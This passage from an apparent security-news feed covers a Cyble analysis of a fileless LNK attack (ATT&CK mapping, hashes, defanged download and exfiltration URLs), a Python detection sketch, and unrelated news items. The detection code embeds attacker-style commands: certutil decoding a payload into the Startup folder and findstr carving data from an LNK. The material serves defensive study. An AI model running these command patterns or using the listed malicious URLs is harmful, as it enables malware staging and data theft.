- Monitor outbound network traffic for signs of exfiltration and communication with command-and-control (C2) servers, especially encrypted and base64-encoded traffic. Use firewalls, IDS/IPS (Intrusion Detection and Prevention Systems), and network analysis tools to detect suspicious web traffic patterns.

MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
Initial Access (TA0001) | Spearphishing Attachment (T1566.001) | The ZIP archive containing the LNK file may be delivered via phishing or spam emails
Persistence (TA0003) | Registry Run Keys / Startup Folder (T1547.001) | update.exe added into the Startup folder
Execution (TA0002) | User Execution: Malicious File (T1204.002) | Malicious LNK file executed by the user after extraction from the archive file
Defence Evasion (TA0005) | Obfuscated Files or Information: LNK Icon Smuggling (T1027.012) | The LNK file uses a PDF file icon, leveraging the "IconEnvironmentDataBlock" to appear as a harmless PDF document
Defence Evasion (TA0005) | Deobfuscate/Decode Files or Information (T1140) | Certutil is used to decode base64 content
Defence Evasion (TA0005) | Obfuscated Files or Information: Compile After Delivery (T1027.004) | CSharp code is compiled and executed in memory
Command and Control (TA0011) | Data Encoding: Non-Standard Encoding (T1132.002) | Encrypted file is downloaded from TA-controlled server
Exfiltration (TA0010) | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003) | Exfiltrated data is transmitted using a standard protocol

Indicators of Compromise (IOCs)

Indicator | Indicator Type | Comments
6b1af6be189e31168b8f4eff84cd475eb5d0cbd08e646760fb352165a30cb269 | SHA-256 | registration_form.pdf.zip
4989882339d745692eabe0a375d8cecd6e7e3af534cd1173d94867b8d069cd7f | SHA-256 | registration_form.pdf.lnk
0e07b96c508dfc0e11f119071cca4ec628dae635771532dae7f034ed369591d7 | SHA-256 | updater.exe
df92e2c56f53c9139da70c5a813b6512df616abd56dc10dc80a625c4512cb7f2 | SHA-256 | updater.exe
e0174968064b45d1b0c255bec351de94bb59852cb7f2e6ac694debbac59acb7a | SHA-256 | d.dll
5aaa5a7ef2eaa13e6e4274ccdb3c80251c868043fa51c2ca1e5b556a65d5166c | SHA-256 | 68679815.txt
531db819d928243bda43997165da1fa3ebda3412e7d9928cb6bd2a8c898a85ae | SHA-256 | 68679813.txt
hxxp://tdea.com.tw/asset/uploads/files/68679813[.]txt | URL | URL used to get the DLL link
hxxp://tdea.com.tw/asset/uploads/files/68679815[.]txt | URL | URL used to get the DLL file
hxxp://tdea[.]com[.]tw/ckeditor/ckfinder/core/connector/php/connector[.]php?command=SaveFile&type=Files&currentFolder=%2F&langCode=en&hash=f92a86fd96382c5a | URL | POST request to send exfiltrated data
hxxp://tdea.com.tw/asset/uploads/files/68679811[.]txt | URL | URL used to get the CSharp (C#) code

The post Stealthy Fileless Attack Targets Attendees of Upcoming US-Taiwan Defense Industry Event appeared first on Cyble.
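The recommendations above ask for EDR logic that notices certutil decoding, executables dropped into the Startup folder and programs compiling C# at runtime. The example below is an added detection sketch, not code from Cyble or from any product: it replays a constructed set of endpoint events shaped like the chain in the write-up and returns the rules that fire. The field names mimic Sysmon process-creation and file-creation events plus a proxy-style HTTP record; all of the log lines are constructed. One assumption worth stating: on .NET Framework, CodeDom compilation with GenerateInMemory = true still launches csc.exe as a child process, so a Startup-folder binary spawning the C# compiler is an observable even though the resulting assembly never touches disk.

```python
"""
Added detection example (not Cyble's code). Replays constructed endpoint
telemetry shaped like the described chain and reports which heuristics fire:
  - an LNK with a double extension such as .pdf.lnk
  - findstr carving content out of an .lnk into a redirected file
  - certutil -decode
  - an .exe written into the per-user Startup folder
  - a Startup-folder process spawning csc.exe (CodeDom on .NET Framework
    shells out to the compiler even with GenerateInMemory = true)
  - a Startup-folder process sending a form-urlencoded POST
Field names imitate Sysmon (Image, ParentImage, CommandLine, TargetFilename)
plus a proxy-style HTTP record; every line below is constructed.
"""
import json
import re

STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.lnk$", re.I)

# Constructed telemetry, one JSON object per line (not real campaign logs).
SAMPLE_EVENTS = r"""
{"source": "sysmon", "id": 11, "Image": "C:\\Program Files\\7-Zip\\7zG.exe", "TargetFilename": "C:\\Users\\u\\Downloads\\registration_form.pdf.lnk"}
{"source": "sysmon", "id": 1, "Image": "C:\\Windows\\System32\\findstr.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "findstr /b PDFBLOB registration_form.pdf.lnk > 1.txt"}
{"source": "sysmon", "id": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -decode 1.txt update.exe"}
{"source": "sysmon", "id": 11, "Image": "C:\\Windows\\System32\\certutil.exe", "TargetFilename": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.exe"}
{"source": "sysmon", "id": 1, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe", "ParentImage": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.exe", "CommandLine": "csc.exe /noconfig /fullpaths @tmp.cmdline"}
{"source": "proxy", "Image": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.exe", "Method": "POST", "ContentType": "application/x-www-form-urlencoded", "Host": "example.invalid"}
{"source": "sysmon", "id": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -hashfile report.pdf SHA256"}
"""


def load_events(text):
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert dict per heuristic hit; benign events yield nothing."""
    alerts = []
    for ev in events:
        img = ev.get("Image", "")
        exe = _basename(img)
        cmd = ev.get("CommandLine", "")
        target = ev.get("TargetFilename", "")
        parent = ev.get("ParentImage", "")

        if target and DOUBLE_EXT_RE.search(target):
            alerts.append({"rule": "lnk_double_extension", "evidence": target})
        if exe == "findstr.exe" and ".lnk" in cmd.lower() and ">" in cmd:
            alerts.append({"rule": "findstr_carve_from_lnk", "evidence": cmd})
        if exe == "certutil.exe" and re.search(r"(^|\s)-decode\b", cmd, re.I):
            alerts.append({"rule": "certutil_decode", "evidence": cmd})
        if target and STARTUP_RE.search(target) and target.lower().endswith(".exe"):
            alerts.append({"rule": "startup_folder_exe_drop", "evidence": target})
        if exe == "csc.exe" and STARTUP_RE.search(parent):
            alerts.append({"rule": "startup_process_spawns_csc", "evidence": parent})
        if (STARTUP_RE.search(img) and ev.get("Method") == "POST"
                and ev.get("ContentType", "").startswith("application/x-www-form-urlencoded")):
            alerts.append({"rule": "startup_process_form_post", "evidence": img})
    return alerts


def triggered_rules(events):
    """Sorted, de-duplicated rule names, convenient for a quick triage view."""
    return sorted({a["rule"] for a in detect(events)})


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(f"{alert['rule']:28} {alert['evidence']}")
```

Each rule on its own is noisy (certutil -decode and findstr have legitimate uses); the value is in correlating them on one host within a short window, and the Startup-folder parent of csc.exe is the strongest single signal here because no ordinary software compiles code from that location.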

by CYBLE

We’re focused on… The new UN convention on cybercrime.

Why? Because the draft text of the UN Convention Against Cybercrime was finalised on 8 August 2024, and we asked Betania Allo (Founder and Principal Consultant, BA Cyber Law & Policy) to tell us more about it.

On the blog this week, we’ve explored some of the details of the convention in a two part interview. First, we talked about the key strengths and weaknesses of the draft convention; and then we considered how this new convention aligns with existing agreements on cybersecurity. Here in the newsletter, though, it’s time to get more practical. What does the UN convention mean, in real terms, for cybersecurity practitioners and organisations in UN Member States?

What does the convention mean for international collaboration in cybersecurity?

“The convention introduces a new era of international cooperation in combating cybercrime,” said Allo. “By mandating the implementation of new laws and regulations in Member States, the convention aims to facilitate cross-border investigations and prosecutions. The success of this endeavour hinges on the willingness of nations to collaborate effectively and establish robust mechanisms to address jurisdictional disputes.

“Practically, the convention is expected to bolster national cybercrime laws, deter cyberattacks and create a safer digital environment for businesses and individuals alike. The enhanced capacity to pursue cross-border cybercriminals will undoubtedly increase accountability and deter future offences.

“For cybersecurity practitioners, the convention will expand the legal framework, driving demand for specialised expertise. Professionals will need to navigate a complex legal landscape while fostering international collaboration.

“Businesses will face new obligations, including heightened cybersecurity investments, supply chain security measures, and robust data protection protocols. Balancing these requirements with the need for innovation will be a critical challenge.”

Which provisions of the UN Cybercrime Convention draft (A/AC.291/L.15) would be most beneficial for a diverse audience (including cybersecurity experts, business leaders, governance, risk, and compliance professionals, and government policymakers) to focus on and elaborate upon?

“This topic resonates with a wide range of stakeholders, each with a vested interest in the protection against cybercrime.

“For example, Article 28 outlines the procedures for the search and seizure of electronic data across borders. For cybersecurity experts, this provision is vital as it addresses the technical and legal challenges of accessing data stored in foreign jurisdictions. The clear guidelines provided in this article help ensure that such actions are carried out legally and efficiently, which is critical for timely incident response and mitigation.

“For business leaders, the implications of this article are important, too. It highlights the need for robust data protection measures and a clear understanding of the legal obligations that may arise if their company’s data is subject to international seizure requests. Understanding this provision can help businesses better prepare for potential cross-border legal challenges related to data security.

“A provision particularly relevant for GRC professionals is in the next Article, 29 – it deals with the real-time collection of traffic data; a crucial tool in tracking cybercriminal activities. The article emphasises the importance of lawful surveillance while balancing the need for privacy and civil liberties.

“GRC professionals must understand this balance to develop compliance strategies that align with both the Convention’s requirements and their organisation’s ethical standards.

“For government policymakers, moreover, Article 29 is a focal point for creating regulations that govern real-time data collection. Policymakers need to ensure that such regulations protect national security while also safeguarding individual privacy rights, a balance that is often challenging but essential.

“Article 30, central to the interception of content data, is a critical tool in investigating serious cybercrimes such as terrorism and child exploitation. This provision is crucial for cybersecurity experts who are involved in the technical aspects of lawful interception. Understanding the legal framework governing these activities ensures that cybersecurity measures are both effective and compliant with international law.

“For business leaders, the interception of content data raises important concerns about data privacy and the potential liabilities their companies might face. Being aware of these provisions helps businesses navigate the complex legal landscape surrounding data interception and develop strategies to protect their interests.”

Read our full interview with Betania Allo on the BHMEA blog

In Part 1, find out what sparked Betania’s interest in the UN Convention against Cybercrime, and discover her perspective on the convention’s strengths and weaknesses.

In Part 2, find out how this new convention aligns with existing cybersecurity agreements, and how we can measure the success of the convention when Member States must develop their own local regulations.

P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

The breach marks yet another attack originating in a file-sharing or -transfer service, a common and highly damaging attack vector for opportunistic cybercriminals.

by Cybersecurity Dive

UK data centers are now critical assets, on a par with electricity grids and water supply systems.

In a landmark move, the UK government has classified data centers as Critical National Infrastructure (CNI) for the first time in nearly a decade. This designation, announced by Technology Secretary Peter Kyle on Thursday, aligns data centers with energy and water systems in terms of national importance.

Statistically, the UK houses more than 500 data centers. The latest change in the government's stance reflects growing recognition of the sector's vital role in powering the digital economy and securing sensitive data.

This new CNI status will provide data centers with enhanced government support during emergencies, including cyberattacks and adverse weather events. The designation ensures that the data held in these facilities, ranging from personal photos to critical NHS records, will be better protected and less susceptible to disruptions.

"CNI designation will, for example, see the setting up of a dedicated CNI data infrastructure team of senior government officials who will monitor and anticipate potential threats, provide prioritised access to security agencies including the National Cyber Security Centre, and coordinate access to emergency services should an incident occur."

Data Centers: Engines of the Digital World

The move comes as the government also backs a significant investment in the sector. A proposed £3.75 billion development for Europe’s largest data center, planned by DC01UK in Hertfordshire, is set to create over 700 local jobs and support nearly 14,000 positions across the UK.

Kyle said, "Data centers are the engines of modern life, they power the digital economy and keep our most personal information safe. Bringing data centers into the Critical National Infrastructure regime will allow better coordination and cooperation with the government against cyber criminals and unexpected events."

Under the new CNI status, data centers will benefit from a dedicated infrastructure team composed of senior government officials. This team will focus on monitoring and anticipating threats, ensuring prioritized access to security agencies such as the National Cyber Security Centre (NCSC), and coordinating emergency responses. These measures aim to mitigate the risk of data breaches and other disruptions that could impact essential services and public trust.

This development also marks a shift in how the UK views digital infrastructure. The CNI designation shows the critical nature of data centers in safeguarding public and private sector information. It also aims to deter cybercriminals by enhancing security measures and providing more robust protection against attacks targeting vital health and financial data.

Critical National Infrastructure Status Will Heighten Trust

In addition to improving security, the CNI status is expected to boost business confidence in investing in UK data centers. The sector, which already generates approximately £4.6 billion annually, will benefit from greater stability and support, potentially attracting more international investment and fostering economic growth.

The announcement follows recent incidents that reflect the sector’s vulnerabilities. For instance, the CrowdStrike incident earlier this summer disrupted 60% of GP practices, affecting patients’ appointment details and health records. Such events have highlighted the need for enhanced protection and the critical role of data centers in maintaining service continuity.

Equinix UK Managing Director Bruce Owen welcomed the decision, emphasizing the integral role of digital infrastructure in modern life. "The internet, and the digital infrastructure that underpins it, has rapidly grown to be as fundamental to each one of our daily lives as water, gas, and electricity," Owen said. "We are pleased to see the government recognize this and take steps to safeguard the industry."

Matthew Evans, Director of Markets and COO at techUK, also supported the move. "Data centers are fundamental to our digitizing economy and are a key driver of growth," Evans said. "We look forward to collaborating closely with the government to ensure the successful implementation of these new measures."

The introduction of Critical National Infrastructure status for data centers reflects a broader strategy to enhance the UK's cyber resilience and support technological advancements. With the introduction of the Cyber Security and Resilience Bill and other initiatives, the government aims to strengthen the country’s defenses against cyber threats and bolster economic growth through increased investment in digital infrastructure.

As the UK continues to position itself as a leader in data security and digital innovation, the new CNI designation for data centers represents a significant step in ensuring the stability and resilience of its critical infrastructure.

by The Cyber Express

Nudge Security unveiled new SSPM (SaaS security posture management) capabilities for its SaaS security and governance platform. This enhancement creates the industry’s most comprehensive solution of its kind, combining SaaS discovery, security posture management, spend management, third-party risk, and identity governance in a single, self-service offering that deploys in minutes. As digital identities become prime targets for cyber threats, organizations are prioritizing efforts to strengthen and monitor identity infrastructure. Nudge Security’s SSPM capabilities enable IT and security …

The post Nudge Security unveils SSPM capabilities to strengthen SaaS security appeared first on Help Net Security.

by Help Net Security

Cybersecurity giant Fortinet, known for its firewalls and network security solutions, has confirmed a cybersecurity incident affecting its systems. The Fortinet data breach confirmation comes following a hacker's claim of stealing a massive 440 gigabytes of files from the company’s Microsoft SharePoint server.

Apart from selling secure networking products, the company also offers SIEM, network management, and EDR/XDR solutions, as well as consulting services. While the exact details of the Fortinet data breach remain unclear, the incident raises concerns about the security of sensitive information entrusted to the company.

Analyzing the Fortinet Data Breach

On September 12, 2024, a threat actor surfaced on dark web marketplace Breachforums, boasting about accessing a significant amount of data from Fortinet's Microsoft Azure SharePoint server. The stolen files reportedly included credentials for an S3 storage bucket, potentially containing sensitive user information.

The bad actor, operating under the alias "Fortibitch", claimed to have also reached out to Fortinet's founder Ken Xie, who allegedly abandoned ransom negotiations. The hacker also questioned why Fortinet had not yet filed an 8-K disclosure with the U.S. Securities and Exchange Commission (SEC), which is a mandatory disclosure for security incidents affecting publicly traded companies.

Fortinet Downplays Data Breach

Fortinet quickly responded by acknowledging the unauthorized access. In a statement on its website, the company disclosed, "An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number (less than 0.3%) of Fortinet customers."

According to Fortinet, it has more than 755,000 customers, which means approximately 2,265 customers could be impacted. The company denied claims of any malware attack on its systems.

“To-date there is no indication that this incident has resulted in malicious activity affecting any customers. Fortinet’s operations, products, and services have not been impacted, and we have identified no evidence of additional access to any other Fortinet resource. The incident did not involve any data encryption, deployment of ransomware, or access to Fortinet’s corporate network,” the statement read.

Throwing light on its internal investigation, Fortinet said, "Given the limited nature of the incident, we have not experienced, and do not currently believe that the incident is reasonably likely to have a material impact to our financial condition or operating results."

The company added that it has already contacted those who were potentially impacted. However, the exact nature of the stolen data and the potential consequences for affected customers remain ambiguous. Fortinet hasn't explicitly confirmed or denied the hacker's claim of stealing 440GB of data. Additionally, details regarding the type of information compromised, such as contact details and financial information, are scarce. This lack of transparency leaves many customers feeling uncertain about the extent of the breach and the potential risks involved.

This incident highlights the growing threats faced by cybersecurity companies themselves. As companies like Fortinet become the guardians of sensitive data, they become prime targets for hackers seeking valuable information.

The Way Forward

Following the breach, it's crucial for Fortinet to prioritize transparency and customer communication. The company should outline the specific data compromised and the steps affected customers can take to mitigate any potential risks. Additionally, a thorough investigation into the breach is necessary to identify vulnerabilities and prevent similar incidents in the future.

In the meantime, customers can take proactive measures to protect themselves. It's advisable to change passwords associated with any accounts potentially linked to Fortinet. Implementing multi-factor authentication (MFA) for added security is also recommended.

The Fortinet data breach serves as a stark reminder of the ever-present threat of cyberattacks. By prioritizing transparency, robust security practices, and customer communication, cybersecurity companies can build trust and mitigate the impact of such incidents.

*Update September 13, 11:30 AM: Based on the customer count that Fortinet has on its website, included an approximate number of customers impacted in the Fortinet data breach.

by The Cyber Express

While Mastercard has cybersecurity oversight needs for its cards and payments businesses, it also sells security services to other companies, including banks and fintechs. 

by Cybersecurity Dive

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have highlighted a growing concern about the spread of false claims related to voting. The announcement, titled "Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections," aims to educate the public on how disinformation tactics are being used to manipulate perceptions and undermine trust in the U.S. electoral process. The announcement comes amid increasing concerns over cybersecurity and the integrity of elections, particularly with the 2024 election cycle approaching. Both the FBI and CISA have observed a troubling trend where foreign actors and cybercriminals propagate misleading information about alleged breaches in U.S. voter registration databases. These claims often exaggerate or fabricate details about voter information hacking to discredit the electoral system and erode public trust.

FBI and CISA Stress Concerns Over Voting Disinformation

(Image: Announcement of "Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections". Source: CISA)

CISA Senior Advisor Cait Conley emphasized the importance of skepticism regarding such claims. "This PSA is designed to inform the public that reports of compromised election infrastructure, such as a hacked voter registration database, should be scrutinized. These allegations are frequently used by foreign entities to influence public opinion and disrupt confidence in our democratic institutions," Conley stated. The FBI, through its Cyber Division, has been actively investigating attempts by malicious actors to interfere with U.S. elections. Deputy Assistant Director Cynthia Kaiser explained, "Our investigations have shown that these actors often attempt to undermine public trust by exaggerating claims about obtaining U.S. voter information. We urge the public to critically assess any reports of hacked voter information and understand that much of the voter registration data is publicly accessible."

The issue of voter information hacking has become a significant point of concern, especially as misinformation campaigns progress. The FBI and CISA work collaboratively with federal, state, local, and territorial election officials to safeguard the voting process and enhance the resilience of U.S. elections. Their efforts include providing support, sharing critical information, and debunking false claims related to voting hacking.

Disinformation and Personal Agendas

The rise of disinformation regarding voter information hacking has prompted both agencies to increase their outreach and educational efforts. They stress that while voter registration information is indeed public, the integrity and security of the election process remain intact. The goal is to prevent misinformation from gaining traction and to ensure that the American public maintains a robust confidence in the democratic system. As the 2024 elections draw nearer, the vigilance of both the FBI and CISA underscores their commitment to protecting electoral integrity. By informing the public about the tactics used by disinformation agents and encouraging a critical approach to sensational claims, they aim to fortify trust in the U.S. election process.

The joint public service announcement (PSA) from the FBI and CISA is an important reminder for the public to critically assess any claims of election-related hacking. This PSA highlights the necessity of skepticism towards unverified allegations, especially those alleging breaches of voter information. Both agencies emphasize their ongoing commitment to addressing and debunking false narratives about voting hacking. Their work is focused on safeguarding the security and integrity of U.S. elections.

For the public, it is crucial to stay well-informed and discerning about the sources of information related to election security. As misinformation can easily spread, relying on verified and authoritative sources is essential for understanding the true state of U.S. elections. The FBI's and CISA's efforts are aimed at ensuring that the electoral process remains transparent and secure, reinforcing public confidence and countering disinformation campaigns effectively.

Role of the FBI and CISA in Elections

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) play critical roles in ensuring the security and integrity of U.S. elections. Their coordinated efforts involve working closely with federal, state, local, and territorial election officials to provide essential services and information aimed at enhancing the security of election processes and maintaining the resilience of the electoral system. To support their mission, both the FBI and CISA encourage the public to report any suspicious or criminal activities, such as ransomware attacks, to the FBI Internet Crime Complaint Center (IC3) at www.ic3.gov. Cyber incidents can also be reported directly to CISA by calling 1-844-Say-CISA (1-844-729-2472), emailing report@dhs.cisa.gov, or reporting online at cisa.gov/report. For additional assistance and resources, individuals can visit CISA's Stop Ransomware page for guidance on tackling ransomware, explore the CISA #Protect2024 initiative for protection against various election-related risks, and utilize Protected Voices for resources on defending against online foreign influence operations, cyber threats, and federal election crimes. These resources are designed to help individuals and organizations stay informed and prepared against potential threats to election security.

by The Cyber Express

In the latest episode of Security Pill, The Cyber Express explored a significant shakeup in the cybersecurity industry sparked by Mastercard's acquisition of Recorded Future, one of the pioneers in threat intelligence. The discussion, featuring Beenu Arora, CEO and Co-Founder of Cyble, examined the potential impact of this acquisition on businesses and industries across various sectors. As cybersecurity becomes more integrated with business strategies, Arora highlighted the importance of threat intelligence and how these changes may affect security priorities. He also discussed the broader implications of acquisitions like this, offering insights into navigating the evolving cybersecurity landscape.

Watch the Video Here: https://youtu.be/Fm8cmLy-s8A?si=6qFuMRL8Q098UGRq

Mastercard's Acquisition

Mastercard's acquisition of Recorded Future stands out as a landmark deal in the cybersecurity industry, with many experts, including Arora, labeling it as historic. "This is one of the largest cybersecurity deals we have seen recently," said Arora. Recorded Future, known for providing real-time threat intelligence, analytics, and insights on cyber threats, has been a leader in its field for over 15 years. Arora elaborated on the implications of this acquisition, stating, "I can only imagine the possibilities, ranging from real-time threat detection for Mastercard's ecosystem of merchants and partners to potentially improving fraud detection capabilities." He highlighted that the deal strengthens Mastercard's position in the cybersecurity space while expanding its reach beyond payment processing.

The Role of Threat Intelligence

Traditionally, threat intelligence has been viewed as a highly technical component of cybersecurity operations. However, with Mastercard's acquisition of Recorded Future, threat intelligence is moving from a niche technology to a central part of a company's security and business strategy. Arora emphasized that threat intelligence should no longer be considered a "siloed technical capability" but a crucial element of broader business strategy. "Threat intelligence sits at the heart of designing business strategies," said Arora, pointing out that the acquisition reinforces the notion that threat intelligence can be a powerful tool for businesses looking to grow securely. This shift in perspective, from viewing threat intelligence as a purely technical function to integrating it into strategic decision-making, is a trend that many businesses are beginning to recognize. Paul, a co-host of the Security Pill podcast, noted that threat intelligence has become "a central component of a security plan," marking a significant shift in how businesses approach cybersecurity. He suggested that Mastercard's acquisition of Recorded Future would serve to drive this point home, further embedding threat intelligence into day-to-day operations.

Navigating the Cybersecurity World

As organizations increasingly prioritize cybersecurity in their business strategies, the question arises: will acquisitions like Mastercard's shift focus away from industries outside of its core business? Paul raised this concern during the discussion, asking whether industries such as healthcare and energy should worry about losing attention from Recorded Future, now that it is part of Mastercard's ecosystem. Arora acknowledged that such concerns are valid but suggested that they are typical of any acquisition. "With any acquisition, the acquirer generally has their own DNA and focus," he said, explaining that Mastercard's focus on the banking and payments sector may influence how Recorded Future operates. However, Arora pointed out that this also offers Recorded Future significant leverage by gaining access to Mastercard's extensive network of merchants and partners. While there is potential for some industries to feel neglected, Arora believes that the cybersecurity ecosystem is robust enough to fill any gaps. "If in case some vacuum gets created, there are other players who would step up to fill that vacuum," he said, mentioning Cyble's role as one of the largest competitors to Recorded Future in mature markets. Cyble works with over 500 organizations globally, spanning both private and government sectors, positioning itself as a key player in the threat intelligence market.

The Future of Threat Intelligence

Looking ahead, Arora is optimistic about the growth and evolution of threat intelligence as an industry. "There's no doubt that this industry is going to expand further," he said, noting that threat intelligence is becoming increasingly important in business strategy discussions. He emphasized that threat intelligence is now a key factor in safeguarding intellectual property, preventing cyberattacks, and mitigating risks. Moreover, as cyberattacks grow more sophisticated, threat intelligence plays a critical role in protecting businesses from both external and internal threats. State-sponsored actors, organized criminals, and financially motivated attackers are constantly seeking sensitive information, making threat intelligence indispensable for businesses looking to defend against such threats. Arora concluded by reinforcing his belief in the power of threat intelligence to drive business growth while maintaining security. "Threat Intel can be a really powerful aspect when you are intending to grow your business securely," he said, aligning with Cyble's mission of "creating a better world for everyone."

Conclusion

The acquisition of Recorded Future by Mastercard marks a pivotal moment in the cybersecurity industry, further cementing the role of threat intelligence in business strategies. While there are concerns about how this acquisition may affect industries outside of Mastercard's core focus, Beenu Arora remains confident that the cybersecurity ecosystem is resilient enough to adapt. As businesses continue to prioritize cybersecurity, the integration of threat intelligence into strategic decision-making will only become more critical in safeguarding against evolving threats. This episode of Security Pill highlights the importance of staying informed about industry trends and exploring potential alternatives to ensure that organizations across all sectors can navigate the changing cybersecurity landscape.

by The Cyber Express

Mr. Michael Clark, deputy director of plans and policy at U.S. Cyber Command, presented a plan to integrate artificial intelligence into military cyber operations at the C3.ai conference, Sept. 10, 2024. The AI roadmap aims to improve analytic capabilities, scale operations, and enhance adversary disruption.

by U.S. Cyber Command News

Episode 363 has brain rot, stolen mobiles in China and streaming fraud!

by Kaspersky

This blog summarizes the Ailurophile Stealer Technical & Malware Analysis Report. It explains in detail the technical analysis of Ailurophile Stealer and how one can secure oneself against security vulnerabilities. What is Ailurophile Stealer? Ailurophile Stealer is an advanced information-stealing malware that first appeared on ThreatMon on August 15, 2024. The malware is hosted on publicly accessible […] The post Ailurophile Stealer: A Threatening Information Stealer Malware appeared first on ThreatMon Blog.

by ThreatMon

Infrastructure as Code (IaC) has become a widely adopted practice in modern DevOps, automating the management and provisioning of technology infrastructure through machine-readable definition files. What can we do to make IaC secure by default? Security workflows for IaC First, let's consider that the security workflows for IaC usually comprise multiple steps and practices. IaC code is stored in version control systems, such as Git, with changes tracked and reviewed before merging, which helps improve … More → The post How to make Infrastructure as Code secure by default appeared first on Help Net Security.

by Help Net Security

Organizations must reassess their email security posture as incidents continue to escalate, leading to financial losses. Key findings reveal a significant increase in email attacks, with many successfully bypassing standard security protocols and targeting vulnerable sectors. Business email compromise, phishing, and sophisticated social engineering tactics continue to evolve, exploiting gaps in security measures. Email attacks skyrocket 293% (Figure: Acronis H1 2024 Cyberthreats Report, August 2024) Email attacks have surged by 293% in the … More → The post Security measures fail to keep up with rising email attacks appeared first on Help Net Security.

by Help Net Security

Organizations are grappling with their current NHI (non-human identities) security strategies, according to Cloud Security Alliance and Astrix Security. The high volume of NHIs significantly amplifies the security challenges organizations face. Each NHI can potentially access sensitive data and critical systems, increasing the attack surface exponentially. Without adequate visibility and control over these NHIs, the risk of security incidents rises. Organizations’ lack of confidence suggests their current NHI security methods are lagging behind their human … More → The post Organizations still don’t know how to handle non-human identities appeared first on Help Net Security.

by Help Net Security

Cyber insurance is poised for exponential growth over the coming decade, but it remains a capital-intensive peril that requires structural innovation, according to CyberCube. The mid-range projection suggests that the US standalone cyber insurance market could reach $45 billion in premiums by 2034, a fivefold increase from today. Cyber insurance is projected to snowball However, product innovation will be required to achieve real growth in exposures rather than mainly rate increases, as seen in recent … More → The post Cyber insurance set for explosive growth appeared first on Help Net Security.

by Help Net Security

Singapore, Singapore, 13th September 2024, CyberNewsWire

by Hackread

Here’s a look at the most interesting products from the past week, featuring releases from Druva, Huntress, Ketch, LOKKER, Tenable, Trellix, and Wing Security. Tenable AI Aware provides exposure insight into AI applications, libraries and plugins Tenable AI Aware leverages agents, passive network monitoring, dynamic application security testing and distributed scan engines to detect approved and unapproved AI software, libraries and browser plugins, along with associated vulnerabilities, thereby mitigating risks of exploitation, data leakage and … More → The post New infosec products of the week: September 13, 2024 appeared first on Help Net Security.

by Help Net Security

A technique to abuse Microsoft's built-in source code editor has finally made it into the wild, thanks to China's Mustang Panda APT.

by Dark Reading

2024-09-13 00:00:00

Kernel ETW is the best ETW

This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections.

by Elastic Security Lab

This vulnerability allows remote attackers to execute arbitrary code on affected installations of mySCADA myPRO. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-4708.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to bypass authentication on affected installations of SolarWinds Access Rights Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-28990.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of SolarWinds Access Rights Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 9.9. The following CVEs are assigned: CVE-2024-28991.

by Zero Day Initiative Advisories

Bank customers in the Central Asia region have been targeted by a new strain of Android malware codenamed Ajina.Banker since at least November 2023 with the goal of harvesting financial information and intercepting two-factor authentication (2FA) messages. Singapore-headquartered Group-IB, which discovered the threat in May 2024, said the malware is propagated via a network of Telegram channels

by The Hacker News

GitLab on Wednesday released security updates to address 17 security vulnerabilities, including a critical flaw that allows an attacker to run pipeline jobs as an arbitrary user. The issue, tracked as CVE-2024-6678, carries a CVSS score of 9.9 out of a maximum of 10.0. "An issue was discovered in GitLab CE/EE affecting all versions starting from 8.14 prior to 17.1.7, starting from 17.2 prior to

by The Hacker News

A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint…

by Hackread

Their findings highlight the frailty of some of the mechanisms for establishing trust on the Internet.

by Dark Reading

An attacker is using the tool to deploy a cryptominer and the Tsunami DDoS bot on compromised systems.

by Dark Reading

Fortinet disclosed a data breach after a threat actor claimed the theft of 440GB of files from the company’s Microsoft Sharepoint server. Today, Fortinet told Cyber Daily that a threat actor gained unauthorized access to a third-party service it used. “An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance […]

by Security Affairs

In most cases, a breach involves hackers stealing data they can then resell on the dark web. Now, it is becoming increasingly common for these same hackers to inflict physical damage with their attacks.

by Barracuda

The dangerous ransomware group is targeting financial and insurance sectors using smishing and vishing against IT service desk administrators, cybersecurity teams, and other employees with top-level privileges.

by Dark Reading

Law enforcement seized electronics containing special hacking tools and software as well as a substantial amount of cash in the raids.

by Dark Reading

